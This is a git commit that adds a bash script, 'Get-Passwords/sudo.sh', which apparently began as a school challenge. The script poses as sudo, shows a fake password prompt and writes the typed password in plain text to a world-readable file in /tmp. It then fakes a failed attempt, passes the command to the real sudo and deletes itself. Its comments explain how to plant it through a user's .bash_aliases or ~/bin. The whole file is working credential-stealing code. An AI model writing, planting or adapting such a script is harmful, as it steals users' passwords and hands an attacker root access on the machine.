Sudo intercept, kind of noisy but it does the thing

2025-10-29 16:59:27 +00:00 · 2017-07-20 18:00:40 -07:00 · 2017-07-20 18:00:40 -07:00 · 957783fa79
commit 957783fa79
parent ee8d591004
1 changed files with 38 additions and 0 deletions
--- a/Get-Passwords/sudo.sh
+++ b/Get-Passwords/sudo.sh
@ -0,0 +1,38 @@
+#!/usr/bin/env bash
+# I wrote this in school for a "read the root:root 0700 file" challenge
+# If you can modify a users .bash_aliases, you can alias sudo to this
+# If you can drop a file in ~/bin (and that's at the start of a users path), you can put this there.
+# Read the comments because certain quirks work if it's an alias vs if it's in ~/bin
+
+user=$(whoami)
+outPath=/tmp/01234-9876-ABEEFC0
+# Set a different cleanup file if you want to easily be able to re-capture
+# By using the same cleanUp indicator as the outPath file, it cleans up after itself.
+cleanUp=/tmp/01234-9876-ABEEFC0
+pwPrompt="[sudo] password for $user:\x20"
+errStr="Sorry, try again."
+# This myPath works if you're dropping it as a binary in $PATH
+myPath="$( cd "$(dirname "$0")" ; pwd -P )/$0"
+
+# This myPath works if you're aliasing sudo to this script
+#myPath="$0"
+
+if [ -f $outPath ]
+then
+    /usr/bin/sudo $@
+else
+    echo -ne $pwPrompt
+    read -s PASSWORD
+    echo
+    echo $PASSWORD > $outPath
+    chmod ugo+rw $outPath
+    echo $errStr
+    /usr/bin/sudo $@
+fi
+if [ -f $cleanUp ]
+then
+   rm $myPath
+   # if it's an alias, you need to clean it up, else you can just delete yourself.
+   #unalias sudo
+   #rm ~/.bash_aliases
+fi